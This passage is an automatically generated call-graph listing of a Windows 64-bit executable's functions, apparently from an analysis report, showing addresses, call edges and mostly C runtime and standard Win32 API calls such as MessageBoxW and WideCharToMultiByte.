16547->16545 16550 7ff7e12c2710 54 API calls 16548->16550 16550->16542 16555 7ff7e12c2710 54 API calls 16553->16555 16554->16545 16555->16542 16559 7ff7e12c2710 54 API calls 16558->16559 16559->16542 16562 7ff7e12c1ca5 16561->16562 16563 7ff7e12d4984 49 API calls 16562->16563 16564 7ff7e12c1cc8 16563->16564 16564->16221 16566 7ff7e12c9390 2 API calls 16565->16566 16567 7ff7e12c89b4 16566->16567 16568 7ff7e12d8238 38 API calls 16567->16568 16569 7ff7e12c89c6 __std_exception_copy 16568->16569 16569->16233 16571 7ff7e12c45cc 16570->16571 16572 7ff7e12c9390 2 API calls 16571->16572 16573 7ff7e12c45f4 16572->16573 16574 7ff7e12c9390 2 API calls 16573->16574 16575 7ff7e12c4607 16574->16575 17962 7ff7e12d5f94 16575->17962 16578 7ff7e12cc550 _log10_special 8 API calls 16579 7ff7e12c392b 16578->16579 16579->16222 16580 7ff7e12c7f90 16579->16580 16581 7ff7e12c7fb4 16580->16581 16582 7ff7e12d06d4 73 API calls 16581->16582 16587 7ff7e12c808b __std_exception_copy 16581->16587 16583 7ff7e12c7fd0 16582->16583 16583->16587 18353 7ff7e12d78c8 16583->18353 16585 7ff7e12d06d4 73 API calls 16588 7ff7e12c7fe5 16585->16588 16586 7ff7e12d039c _fread_nolock 53 API calls 16586->16588 16587->16227 16588->16585 16588->16586 16588->16587 16590 7ff7e12d007c 16589->16590 18368 7ff7e12cfe28 16590->18368 16592 7ff7e12d0095 16592->16222 16594 7ff7e12cc850 16593->16594 16595 7ff7e12c2734 GetCurrentProcessId 16594->16595 16596 7ff7e12c1c80 49 API calls 16595->16596 16597 7ff7e12c2787 16596->16597 16598 7ff7e12d4984 49 API calls 16597->16598 16599 7ff7e12c27cf 16598->16599 16600 7ff7e12c2620 12 API calls 16599->16600 16601 7ff7e12c27f1 16600->16601 16602 7ff7e12cc550 _log10_special 8 API calls 16601->16602 16603 7ff7e12c2801 16602->16603 16603->16287 16605 7ff7e12c1c80 49 API calls 16604->16605 16606 7ff7e12c44fd 16605->16606 16606->16265 16608 7ff7e12c1c80 49 API calls 16607->16608 16609 7ff7e12c4660 16608->16609 16609->16282 16611 7ff7e12c6dd5 16610->16611 16612 7ff7e12c3e6c 16611->16612 16613 7ff7e12d4f08 _set_fmode 11 API calls 16611->16613 16616 7ff7e12c7340 16612->16616 16614 7ff7e12c6de2 16613->16614 16615 7ff7e12c2910 54 API calls 16614->16615 16615->16612 18379 7ff7e12c1470 16616->18379 16618 7ff7e12c7368 16619 7ff7e12c4630 49 API calls 16618->16619 16629 7ff7e12c74b9 __std_exception_copy 16618->16629 18485 7ff7e12c6360 16684->18485 16687 7ff7e12c3399 16693 7ff7e12c3670 16687->16693 16694 7ff7e12c367e 16693->16694 16704 7ff7e12d546c EnterCriticalSection 16697->16704 16706 7ff7e12cc87a 16705->16706 16706->16396 16706->16706 16708 7ff7e12c92bf FindClose 16707->16708 16709 7ff7e12c92d2 16707->16709 16708->16709 16710 7ff7e12cc550 _log10_special 8 API calls 16709->16710 16711 7ff7e12c371a 16710->16711 16711->16402 16711->16403 16713 7ff7e12cc850 16712->16713 16714 7ff7e12c2c70 GetCurrentProcessId 16713->16714 16743 7ff7e12c26b0 16714->16743 16716 7ff7e12c2cb9 16747 7ff7e12d4bd8 16716->16747 16719 7ff7e12c26b0 48 API calls 16720 7ff7e12c2d34 FormatMessageW 16719->16720 16722 7ff7e12c2d7f MessageBoxW 16720->16722 16723 7ff7e12c2d6d 16720->16723 16725 7ff7e12cc550 _log10_special 8 API calls 16722->16725 16724 7ff7e12c26b0 48 API calls 16723->16724 16724->16722 16726 7ff7e12c2daf 16725->16726 16726->16415 16728 7ff7e12c9340 GetFinalPathNameByHandleW CloseHandle 16727->16728 16729 7ff7e12c3730 16727->16729 16728->16729 16729->16410 16729->16411 16731 7ff7e12c2834 16730->16731 16732 7ff7e12c26b0 48 API calls 16731->16732 16733 7ff7e12c2887 16732->16733 16734 7ff7e12d4bd8 48 API calls 16733->16734 16735 7ff7e12c28d0 MessageBoxW 16734->16735 16736 7ff7e12cc550 _log10_special 8 API calls 16735->16736 16737 7ff7e12c2900 16736->16737 16737->16415 16739 7ff7e12c9495 16738->16739 16740 7ff7e12c946a WideCharToMultiByte 16738->16740 16741 7ff7e12c94b2 WideCharToMultiByte 16739->16741 16742 7ff7e12c94ab __std_exception_copy 16739->16742 16740->16739 16740->16742 16741->16742 16742->16407 16744 7ff7e12c26d5 16743->16744 16745 7ff7e12d4bd8 48 API calls 16744->16745 16746 7ff7e12c26f8 16745->16746 16746->16716 16749 7ff7e12d4c32 16747->16749 16748 7ff7e12d4c57 16750 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 16748->16750 16749->16748 16751 7ff7e12d4c93 16749->16751 16753 7ff7e12d4c81 16750->16753 16765 7ff7e12d2f90 16751->16765 16754 7ff7e12cc550 _log10_special 8 API calls 16753->16754 16756 7ff7e12c2d04 16754->16756 16755 7ff7e12da948 __free_lconv_num 11 API calls 16755->16753 16756->16719 16758 7ff7e12d4d49 16761 7ff7e12da948 __free_lconv_num 11 API calls 16758->16761 16759 7ff7e12d4d9a 16760 7ff7e12d4da4 16759->16760 16764 7ff7e12d4d74 16759->16764 16763 7ff7e12da948 __free_lconv_num 11 API calls 16760->16763 16761->16753 16762 7ff7e12d4d40 16762->16758 16762->16764 16763->16753 16764->16755 16766 7ff7e12d2fce 16765->16766 16771 7ff7e12d2fbe 16765->16771 16767 7ff7e12d2fd7 16766->16767 16773 7ff7e12d3005 16766->16773 16770 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 16767->16770 16768 7ff7e12d2ffd 16768->16758 16768->16759 16768->16762 16768->16764 16769 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 16769->16768 16770->16768 16771->16769 16773->16768 16773->16771 16776 7ff7e12d39a4 16773->16776 16809 7ff7e12d33f0 16773->16809 16846 7ff7e12d2b80 16773->16846 16777 7ff7e12d39e6 16776->16777 16778 7ff7e12d3a57 16776->16778 16781 7ff7e12d3a81 16777->16781 16782 7ff7e12d39ec 16777->16782 16779 7ff7e12d3ab0 16778->16779 16780 7ff7e12d3a5c 16778->16780 16787 7ff7e12d3ac7 16779->16787 16789 7ff7e12d3aba 16779->16789 16794 7ff7e12d3abf 16779->16794 16785 7ff7e12d3a91 16780->16785 16786 7ff7e12d3a5e 16780->16786 16869 7ff7e12d1d54 16781->16869 16783 7ff7e12d3a20 16782->16783 16784 7ff7e12d39f1 16782->16784 16790 7ff7e12d39f7 16783->16790 16783->16794 16784->16787 16784->16790 16876 7ff7e12d1944 16785->16876 16788 7ff7e12d3a00 16786->16788 16798 7ff7e12d3a6d 16786->16798 16883 7ff7e12d46ac 16787->16883 16807 7ff7e12d3af0 16788->16807 16849 7ff7e12d4158 16788->16849 16789->16781 16789->16794 16790->16788 16797 7ff7e12d3a32 16790->16797 16805 7ff7e12d3a1b 16790->16805 16794->16807 16887 7ff7e12d2164 16794->16887 16797->16807 16859 7ff7e12d4494 16797->16859 16798->16781 16799 7ff7e12d3a72 16798->16799 16799->16807 16865 7ff7e12d4558 16799->16865 16801 7ff7e12cc550 _log10_special 8 API calls 16802 7ff7e12d3dea 16801->16802 16802->16773 16805->16807 16808 7ff7e12d3cdc 16805->16808 16894 7ff7e12d47c0 16805->16894 16807->16801 16808->16807 16900 7ff7e12dea08 16808->16900 16810 7ff7e12d3414 16809->16810 16811 7ff7e12d33fe 16809->16811 16812 7ff7e12d3454 16810->16812 16813 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 16810->16813 16811->16812 16814 7ff7e12d39e6 16811->16814 16815 7ff7e12d3a57 16811->16815 16812->16773 16813->16812 16818 7ff7e12d3a81 16814->16818 16819 7ff7e12d39ec 16814->16819 16816 7ff7e12d3ab0 16815->16816 16817 7ff7e12d3a5c 16815->16817 16824 7ff7e12d3ac7 16816->16824 16826 7ff7e12d3aba 16816->16826 16831 7ff7e12d3abf 16816->16831 16822 7ff7e12d3a91 16817->16822 16823 7ff7e12d3a5e 16817->16823 16828 7ff7e12d1d54 38 API calls 16818->16828 16820 7ff7e12d3a20 16819->16820 16821 7ff7e12d39f1 16819->16821 16827 7ff7e12d39f7 16820->16827 16820->16831 16821->16824 16821->16827 16829 7ff7e12d1944 38 API calls 16822->16829 16825 7ff7e12d3a00 16823->16825 16836 7ff7e12d3a6d 16823->16836 16833 7ff7e12d46ac 45 API calls 16824->16833 16830 7ff7e12d4158 47 API calls 16825->16830 16845 7ff7e12d3af0 16825->16845 16826->16818 16826->16831 16827->16825 16832 7ff7e12d3a1b 16827->16832 16834 7ff7e12d3a32 16827->16834 16828->16832 16829->16832 16830->16832 16835 7ff7e12d2164 38 API calls 16831->16835 16831->16845 16842 7ff7e12d47c0 45 API calls 16832->16842 16844 7ff7e12d3cdc 16832->16844 16832->16845 16833->16832 16837 7ff7e12d4494 46 API calls 16834->16837 16834->16845 16835->16832 16836->16818 16838 7ff7e12d3a72 16836->16838 16837->16832 16841 7ff7e12d4558 37 API calls 16838->16841 16838->16845 16839 7ff7e12cc550 _log10_special 8 API calls 16840 7ff7e12d3dea 16839->16840 16840->16773 16841->16832 16842->16844 16843 7ff7e12dea08 46 API calls 16843->16844 16844->16843 16844->16845 16845->16839 17094 7ff7e12d0fc8 16846->17094 16850 7ff7e12d417e 16849->16850 16912 7ff7e12d0b80 16850->16912 16854 7ff7e12d42c3 16856 7ff7e12d4351 16854->16856 16858 7ff7e12d47c0 45 API calls 16854->16858 16856->16805 16857 7ff7e12d47c0 45 API calls 16857->16854 16858->16856 16860 7ff7e12d44c9 16859->16860 16861 7ff7e12d450e 16860->16861 16862 7ff7e12d44e7 16860->16862 16863 7ff7e12d47c0 45 API calls 16860->16863 16861->16805 16864 7ff7e12dea08 46 API calls 16862->16864 16863->16862 16864->16861 16866 7ff7e12d4579 16865->16866 16867 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 16866->16867 16868 7ff7e12d45aa 16866->16868 16867->16868 16868->16805 16870 7ff7e12d1d87 16869->16870 16871 7ff7e12d1db6 16870->16871 16873 7ff7e12d1e73 16870->16873 16875 7ff7e12d1df3 16871->16875 17048 7ff7e12d0c28 16871->17048 16874 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 16873->16874 16874->16875 16875->16805 16877 7ff7e12d1977 16876->16877 16878 7ff7e12d19a6 16877->16878 16880 7ff7e12d1a63 16877->16880 16879 7ff7e12d0c28 12 API calls 16878->16879 16882 7ff7e12d19e3 16878->16882 16879->16882 16881 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 16880->16881 16881->16882 16882->16805 16884 7ff7e12d46ef 16883->16884 16885 7ff7e12d46f3 __crtLCMapStringW 16884->16885 17056 7ff7e12d4748 16884->17056 16885->16805 16888 7ff7e12d2197 16887->16888 16889 7ff7e12d21c6 16888->16889 16891 7ff7e12d2283 16888->16891 16890 7ff7e12d0c28 12 API calls 16889->16890 16893 7ff7e12d2203 16889->16893 16890->16893 16892 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 16891->16892 16892->16893 16893->16805 16895 7ff7e12d47d7 16894->16895 17060 7ff7e12dd9b8 16895->17060 16901 7ff7e12dea39 16900->16901 16909 7ff7e12dea47 16900->16909 16902 7ff7e12dea67 16901->16902 16903 7ff7e12d47c0 45 API calls 16901->16903 16901->16909 16904 7ff7e12dea9f 16902->16904 16905 7ff7e12dea78 16902->16905 16903->16902 16907 7ff7e12deb2a 16904->16907 16908 7ff7e12deac9 16904->16908 16904->16909 17084 7ff7e12e00a0 16905->17084 16910 7ff7e12df8a0 _fread_nolock MultiByteToWideChar 16907->16910 16908->16909 17087 7ff7e12df8a0 16908->17087 16909->16808 16910->16909 16913 7ff7e12d0ba6 16912->16913 16914 7ff7e12d0bb7 16912->16914 16920 7ff7e12de570 16913->16920 16914->16913 16915 7ff7e12dd5fc _fread_nolock 12 API calls 16914->16915 16916 7ff7e12d0be4 16915->16916 16917 7ff7e12d0bf8 16916->16917 16918 7ff7e12da948 __free_lconv_num 11 API calls 16916->16918 16919 7ff7e12da948 __free_lconv_num 11 API calls 16917->16919 16918->16917 16919->16913 16921 7ff7e12de5c0 16920->16921 16922 7ff7e12de58d 16920->16922 16921->16922 16925 7ff7e12de5f2 16921->16925 16923 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 16922->16923 16933 7ff7e12d42a1 16923->16933 16924 7ff7e12de705 16926 7ff7e12de7f7 16924->16926 16928 7ff7e12de7bd 16924->16928 16930 7ff7e12de78c 16924->16930 16932 7ff7e12de74f 16924->16932 16935 7ff7e12de745 16924->16935 16925->16924 16936 7ff7e12de63a 16925->16936 16975 7ff7e12dda5c 16926->16975 16968 7ff7e12dddf4 16928->16968 16961 7ff7e12de0d4 16930->16961 16951 7ff7e12de304 16932->16951 16933->16854 16933->16857 16935->16928 16937 7ff7e12de74a 16935->16937 16936->16933 16942 7ff7e12da4a4 16936->16942 16937->16930 16937->16932 16940 7ff7e12da900 _isindst 17 API calls 16941 7ff7e12de854 16940->16941 16943 7ff7e12da4b1 16942->16943 16944 7ff7e12da4bb 16942->16944 16943->16944 16949 7ff7e12da4d6 16943->16949 16945 7ff7e12d4f08 _set_fmode 11 API calls 16944->16945 16946 7ff7e12da4c2 16945->16946 16947 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 16946->16947 16948 7ff7e12da4ce 16947->16948 16948->16933 16948->16940 16949->16948 16950 7ff7e12d4f08 _set_fmode 11 API calls 16949->16950 16950->16946 16984 7ff7e12e40ac 16951->16984 16955 7ff7e12de3ac 16956 7ff7e12de401 16955->16956 16957 7ff7e12de3b0 16955->16957 16958 7ff7e12de3cc 16955->16958 17037 7ff7e12ddef0 16956->17037 16957->16933 17033 7ff7e12de1ac 16958->17033 16962 7ff7e12e40ac 38 API calls 16961->16962 16963 7ff7e12de11e 16962->16963 16964 7ff7e12e3af4 37 API calls 16963->16964 16965 7ff7e12de16e 16964->16965 16966 7ff7e12de1ac 45 API calls 16965->16966 16967 7ff7e12de172 16965->16967 16966->16967 16967->16933 16969 7ff7e12e40ac 38 API calls 16968->16969 16970 7ff7e12dde3f 16969->16970 16971 7ff7e12e3af4 37 API calls 16970->16971 16972 7ff7e12dde97 16971->16972 16973 7ff7e12dde9b 16972->16973 16974 7ff7e12ddef0 45 API calls 16972->16974 16973->16933 16974->16973 16976 7ff7e12ddad4 16975->16976 16977 7ff7e12ddaa1 16975->16977 16979 7ff7e12ddaec 16976->16979 16981 7ff7e12ddb6d 16976->16981 16978 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 16977->16978 16983 7ff7e12ddacd __scrt_get_show_window_mode 16978->16983 16980 7ff7e12dddf4 46 API calls 16979->16980 16980->16983 16982 7ff7e12d47c0 45 API calls 16981->16982 16981->16983 16982->16983 16983->16933 16985 7ff7e12e40ff fegetenv 16984->16985 16986 7ff7e12e7e2c 37 API calls 16985->16986 16989 7ff7e12e4152 16986->16989 16987 7ff7e12e4242 16990 7ff7e12e7e2c 37 API calls 16987->16990 16988 7ff7e12e417f 16992 7ff7e12da4a4 __std_exception_copy 37 API calls 16988->16992 16989->16987 16993 7ff7e12e421c 16989->16993 16994 7ff7e12e416d 16989->16994 16991 7ff7e12e426c 16990->16991 16995 7ff7e12e7e2c 37 API calls 16991->16995 16996 7ff7e12e41fd 16992->16996 16998 7ff7e12da4a4 __std_exception_copy 37 API calls 16993->16998 16994->16987 16994->16988 16999 7ff7e12e427d 16995->16999 16997 7ff7e12e5324 16996->16997 17004 7ff7e12e4205 16996->17004 17000 7ff7e12da900 _isindst 17 API calls 16997->17000 16998->16996 17001 7ff7e12e8020 20 API calls 16999->17001 17002 7ff7e12e5339 17000->17002 17013 7ff7e12e42e6 __scrt_get_show_window_mode 17001->17013 17003 7ff7e12cc550 _log10_special 8 API calls 17005 7ff7e12de351 17003->17005 17004->17003 17029 7ff7e12e3af4 17005->17029 17006 7ff7e12e468f __scrt_get_show_window_mode 17007 7ff7e12e4783 memcpy_s __scrt_get_show_window_mode 17012 7ff7e12e497b 17007->17012 17023 7ff7e12d4f08 11 API calls _set_fmode 17007->17023 17025 7ff7e12da8e0 37 API calls _invalid_parameter_noinfo 17007->17025 17008 7ff7e12e4327 memcpy_s 17008->17007 17010 7ff7e12e4c6b memcpy_s __scrt_get_show_window_mode 17008->17010 17009 7ff7e12e49cf 17011 7ff7e12e3c10 37 API calls 17009->17011 17010->17009 17010->17012 17021 7ff7e12d4f08 11 API calls _set_fmode 17010->17021 17028 7ff7e12da8e0 37 API calls _invalid_parameter_noinfo 17010->17028 17015 7ff7e12e50e7 17011->17015 17012->17009 17012->17012 17014 7ff7e12e533c memcpy_s 37 API calls 17012->17014 17013->17006 17013->17008 17016 7ff7e12d4f08 _set_fmode 11 API calls 17013->17016 17014->17009 17015->17015 17020 7ff7e12e533c memcpy_s 37 API calls 17015->17020 17027 7ff7e12e5142 17015->17027 17017 7ff7e12e4760 17016->17017 17019 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 17017->17019 17018 7ff7e12e52c8 17022 7ff7e12e7e2c 37 API calls 17018->17022 17019->17008 17020->17027 17021->17010 17022->17004 17023->17007 17024 7ff7e12e3c10 37 API calls 17024->17027 17025->17007 17026 7ff7e12e533c memcpy_s 37 API calls 17026->17027 17027->17018 17027->17024 17027->17026 17028->17010 17030 7ff7e12e3b13 17029->17030 17031 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 17030->17031 17032 7ff7e12e3b3e memcpy_s 17030->17032 17031->17032 17032->16955 17034 7ff7e12de1d8 memcpy_s 17033->17034 17035 7ff7e12d47c0 45 API calls 17034->17035 17036 7ff7e12de292 memcpy_s __scrt_get_show_window_mode 17034->17036 17035->17036 17036->16957 17038 7ff7e12ddf2b 17037->17038 17042 7ff7e12ddf78 memcpy_s 17037->17042 17039 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 17038->17039 17040 7ff7e12ddf57 17039->17040 17040->16957 17041 7ff7e12ddfe3 17043 7ff7e12da4a4 __std_exception_copy 37 API calls 17041->17043 17042->17041 17044 7ff7e12d47c0 45 API calls 17042->17044 17047 7ff7e12de025 memcpy_s 17043->17047 17044->17041 17045 7ff7e12da900 _isindst 17 API calls 17046 7ff7e12de0d0 17045->17046 17047->17045 17049 7ff7e12d0c5f 17048->17049 17055 7ff7e12d0c4e 17048->17055 17050 7ff7e12dd5fc _fread_nolock 12 API calls 17049->17050 17049->17055 17051 7ff7e12d0c90 17050->17051 17052 7ff7e12d0ca4 17051->17052 17053 7ff7e12da948 __free_lconv_num 11 API calls 17051->17053 17054 7ff7e12da948 __free_lconv_num 11 API calls 17052->17054 17053->17052 17054->17055 17055->16875 17057 7ff7e12d4766 17056->17057 17058 7ff7e12d476e 17056->17058 17059 7ff7e12d47c0 45 API calls 17057->17059 17058->16885 17059->17058 17061 7ff7e12d47ff 17060->17061 17062 7ff7e12dd9d1 17060->17062 17064 7ff7e12dda24 17061->17064 17062->17061 17068 7ff7e12e3304 17062->17068 17065 7ff7e12d480f 17064->17065 17066 7ff7e12dda3d 17064->17066 17065->16808 17066->17065 17081 7ff7e12e2650 17066->17081 17069 7ff7e12db150 _CreateFrameInfo 45 API calls 17068->17069 17070 7ff7e12e3313 17069->17070 17071 7ff7e12e335e 17070->17071 17080 7ff7e12e02d8 EnterCriticalSection 17070->17080 17071->17061 17082 7ff7e12db150 _CreateFrameInfo 45 API calls 17081->17082 17083 7ff7e12e2659 17082->17083 17090 7ff7e12e6d88 17084->17090 17088 7ff7e12df8a9 MultiByteToWideChar 17087->17088 17093 7ff7e12e6dec 17090->17093 17091 7ff7e12cc550 _log10_special 8 API calls 17092 7ff7e12e00bd 17091->17092 17092->16909 17093->17091 17095 7ff7e12d100f 17094->17095 17096 7ff7e12d0ffd 17094->17096 17099 7ff7e12d101d 17095->17099 17102 7ff7e12d1059 17095->17102 17097 7ff7e12d4f08 _set_fmode 11 API calls 17096->17097 17098 7ff7e12d1002 17097->17098 17100 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 17098->17100 17101 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 17099->17101 17110 7ff7e12d100d 17100->17110 17101->17110 17103 7ff7e12d13d5 17102->17103 17105 7ff7e12d4f08 _set_fmode 11 API calls 17102->17105 17104 7ff7e12d4f08 _set_fmode 11 API calls 17103->17104 17103->17110 17106 7ff7e12d1669 17104->17106 17107 7ff7e12d13ca 17105->17107 17108 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 17106->17108 17109 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 17107->17109 17108->17110 17109->17103 17110->16773 17112 7ff7e12d0704 17111->17112 17139 7ff7e12d0464 17112->17139 17114 7ff7e12d071d 17114->16426 17151 7ff7e12d03bc 17115->17151 17119 7ff7e12cc850 17118->17119 17120 7ff7e12c2930 GetCurrentProcessId 17119->17120 17121 7ff7e12c1c80 49 API calls 17120->17121 17122 7ff7e12c2979 17121->17122 17165 7ff7e12d4984 17122->17165 17127 7ff7e12c1c80 49 API calls 17128 7ff7e12c29ff 17127->17128 17195 7ff7e12c2620 17128->17195 17131 7ff7e12cc550 _log10_special 8 API calls 17132 7ff7e12c2a31 17131->17132 17132->16465 17134 7ff7e12d0119 17133->17134 17138 7ff7e12c1b89 17133->17138 17135 7ff7e12d4f08 _set_fmode 11 API calls 17134->17135 17136 7ff7e12d011e 17135->17136 17137 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 17136->17137 17137->17138 17138->16464 17138->16465 17140 7ff7e12d04ce 17139->17140 17141 7ff7e12d048e 17139->17141 17140->17141 17143 7ff7e12d04da 17140->17143 17142 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 17141->17142 17149 7ff7e12d04b5 17142->17149 17150 7ff7e12d546c EnterCriticalSection 17143->17150 17149->17114 17152 7ff7e12d03e6 17151->17152 17163 7ff7e12c1a20 17151->17163 17153 7ff7e12d0432 17152->17153 17157 7ff7e12d03f5 __scrt_get_show_window_mode 17152->17157 17152->17163 17164 7ff7e12d546c EnterCriticalSection 17153->17164 17155 7ff7e12d4f08 _set_fmode 11 API calls 17158 7ff7e12d040a 17155->17158 17157->17155 17160 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 17158->17160 17160->17163 17163->16434 17163->16435 17169 7ff7e12d49de 17165->17169 17166 7ff7e12d4a03 17167 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 17166->17167 17171 7ff7e12d4a2d 17167->17171 17168 7ff7e12d4a3f 17204 7ff7e12d2c10 17168->17204 17169->17166 17169->17168 17173 7ff7e12cc550 _log10_special 8 API calls 17171->17173 17172 7ff7e12da948 __free_lconv_num 11 API calls 17172->17171 17175 7ff7e12c29c3 17173->17175 17183 7ff7e12d5160 17175->17183 17176 7ff7e12d4b40 17178 7ff7e12d4b1c 17176->17178 17179 7ff7e12d4b4a 17176->17179 17177 7ff7e12d4ae8 17177->17178 17181 7ff7e12d4af1 17177->17181 17178->17172 17182 7ff7e12da948 __free_lconv_num 11 API calls 17179->17182 17180 7ff7e12da948 __free_lconv_num 11 API calls 17180->17171 17181->17180 17182->17171 17184 7ff7e12db2c8 _set_fmode 11 API calls 17183->17184 17185 7ff7e12d5177 17184->17185 17186 7ff7e12deb98 _set_fmode 11 API calls 17185->17186 17189 7ff7e12d51b7 17185->17189 17192 7ff7e12c29e5 17185->17192 17187 7ff7e12d51ac 17186->17187 17188 7ff7e12da948 __free_lconv_num 11 API calls 17187->17188 17188->17189 17189->17192 17342 7ff7e12dec20 17189->17342 17192->17127 17193 7ff7e12da900 _isindst 17 API calls 17194 7ff7e12d51fc 17193->17194 17196 7ff7e12c262f 17195->17196 17197 7ff7e12c9390 2 API calls 17196->17197 17198 7ff7e12c2660 17197->17198 17199 7ff7e12c266f MessageBoxW 17198->17199 17200 7ff7e12c2683 MessageBoxA 17198->17200 17201 7ff7e12c2690 17199->17201 17200->17201 17202 7ff7e12cc550 _log10_special 8 API calls 17201->17202 17203 7ff7e12c26a0 17202->17203 17203->17131 17205 7ff7e12d2c4e 17204->17205 17206 7ff7e12d2c3e 17204->17206 17207 7ff7e12d2c57 17205->17207 17214 7ff7e12d2c85 17205->17214 17209 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 17206->17209 17210 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 17207->17210 17208 7ff7e12d2c7d 17208->17176 17208->17177 17208->17178 17208->17181 17209->17208 17210->17208 17211 7ff7e12d47c0 45 API calls 17211->17214 17213 7ff7e12d2f34 17216 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 17213->17216 17214->17206 17214->17208 17214->17211 17214->17213 17218 7ff7e12d35a0 17214->17218 17244 7ff7e12d3268 17214->17244 17274 7ff7e12d2af0 17214->17274 17216->17206 17219 7ff7e12d3655 17218->17219 17220 7ff7e12d35e2 17218->17220 17223 7ff7e12d36af 17219->17223 17224 7ff7e12d365a 17219->17224 17221 7ff7e12d367f 17220->17221 17222 7ff7e12d35e8 17220->17222 17291 7ff7e12d1b50 17221->17291 17231 7ff7e12d35ed 17222->17231 17236 7ff7e12d36be 17222->17236 17223->17221 17233 7ff7e12d3618 17223->17233 17223->17236 17225 7ff7e12d368f 17224->17225 17226 7ff7e12d365c 17224->17226 17298 7ff7e12d1740 17225->17298 17228 7ff7e12d35fd 17226->17228 17235 7ff7e12d366b 17226->17235 17243 7ff7e12d36ed 17228->17243 17277 7ff7e12d3f04 17228->17277 17231->17228 17231->17233 17234 7ff7e12d3630 17231->17234 17233->17243 17312 7ff7e12de858 17233->17312 17234->17243 17287 7ff7e12d43c0 17234->17287 17235->17221 17237 7ff7e12d3670 17235->17237 17236->17243 17305 7ff7e12d1f60 17236->17305 17240 7ff7e12d4558 37 API calls 17237->17240 17237->17243 17239 7ff7e12cc550 _log10_special 8 API calls 17241 7ff7e12d3983 17239->17241 17240->17233 17241->17214 17243->17239 17245 7ff7e12d3273 17244->17245 17246 7ff7e12d3289 17244->17246 17247 7ff7e12d32c7 17245->17247 17249 7ff7e12d3655 17245->17249 17250 7ff7e12d35e2 17245->17250 17246->17247 17248 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 17246->17248 17247->17214 17248->17247 17253 7ff7e12d36af 17249->17253 17254 7ff7e12d365a 17249->17254 17251 7ff7e12d367f 17250->17251 17252 7ff7e12d35e8 17250->17252 17258 7ff7e12d1b50 38 API calls 17251->17258 17257 7ff7e12d36be 17252->17257 17261 7ff7e12d35ed 17252->17261 17253->17251 17253->17257 17272 7ff7e12d3618 17253->17272 17255 7ff7e12d368f 17254->17255 17256 7ff7e12d365c 17254->17256 17259 7ff7e12d1740 38 API calls 17255->17259 17263 7ff7e12d366b 17256->17263 17264 7ff7e12d35fd 17256->17264 17262 7ff7e12d1f60 38 API calls 17257->17262 17273 7ff7e12d36ed 17257->17273 17258->17272 17259->17272 17260 7ff7e12d3f04 47 API calls 17260->17272 17261->17264 17265 7ff7e12d3630 17261->17265 17261->17272 17262->17272 17263->17251 17266 7ff7e12d3670 17263->17266 17264->17260 17264->17273 17267 7ff7e12d43c0 47 API calls 17265->17267 17265->17273 17269 7ff7e12d4558 37 API calls 17266->17269 17266->17273 17267->17272 17268 7ff7e12cc550 _log10_special 8 API calls 17270 7ff7e12d3983 17268->17270 17269->17272 17270->17214 17271 7ff7e12de858 47 API calls 17271->17272 17272->17271 17272->17273 17273->17268 17325 7ff7e12d0d14 17274->17325 17278 7ff7e12d3f26 17277->17278 17279 7ff7e12d0b80 12 API calls 17278->17279 17280 7ff7e12d3f6e 17279->17280 17281 7ff7e12de570 46 API calls 17280->17281 17282 7ff7e12d4041 17281->17282 17283 7ff7e12d4063 17282->17283 17284 7ff7e12d47c0 45 API calls 17282->17284 17285 7ff7e12d47c0 45 API calls 17283->17285 17286 7ff7e12d40ec 17283->17286 17284->17283 17285->17286 17286->17233 17288 7ff7e12d4440 17287->17288 17289 7ff7e12d43d8 17287->17289 17288->17233 17289->17288 17290 7ff7e12de858 47 API calls 17289->17290 17290->17288 17292 7ff7e12d1b83 17291->17292 17293 7ff7e12d1bb2 17292->17293 17296 7ff7e12d1c6f 17292->17296 17294 7ff7e12d1bef 17293->17294 17295 7ff7e12d0b80 12 API calls 17293->17295 17294->17233 17295->17294 17297 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 17296->17297 17297->17294 17299 7ff7e12d1773 17298->17299 17300 7ff7e12d17a2 17299->17300 17302 7ff7e12d185f 17299->17302 17301 7ff7e12d0b80 12 API calls 17300->17301 17304 7ff7e12d17df 17300->17304 17301->17304 17303 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 17302->17303 17303->17304 17304->17233 17306 7ff7e12d1f93 17305->17306 17307 7ff7e12d1fc2 17306->17307 17309 7ff7e12d207f 17306->17309 17308 7ff7e12d0b80 12 API calls 17307->17308 17311 7ff7e12d1fff 17307->17311 17308->17311 17310 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 17309->17310 17310->17311 17311->17233 17315 7ff7e12de880 17312->17315 17313 7ff7e12de8ae __scrt_get_show_window_mode 17317 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 17313->17317 17321 7ff7e12de885 __scrt_get_show_window_mode 17313->17321 17314 7ff7e12de8c5 17314->17313 17314->17321 17322 7ff7e12e07e8 17314->17322 17315->17313 17315->17314 17316 7ff7e12d47c0 45 API calls 17315->17316 17315->17321 17316->17314 17317->17321 17321->17233 17324 7ff7e12e080c WideCharToMultiByte 17322->17324 17326 7ff7e12d0d53 17325->17326 17327 7ff7e12d0d41 17325->17327 17330 7ff7e12d0d60 17326->17330 17333 7ff7e12d0d9d 17326->17333 17328 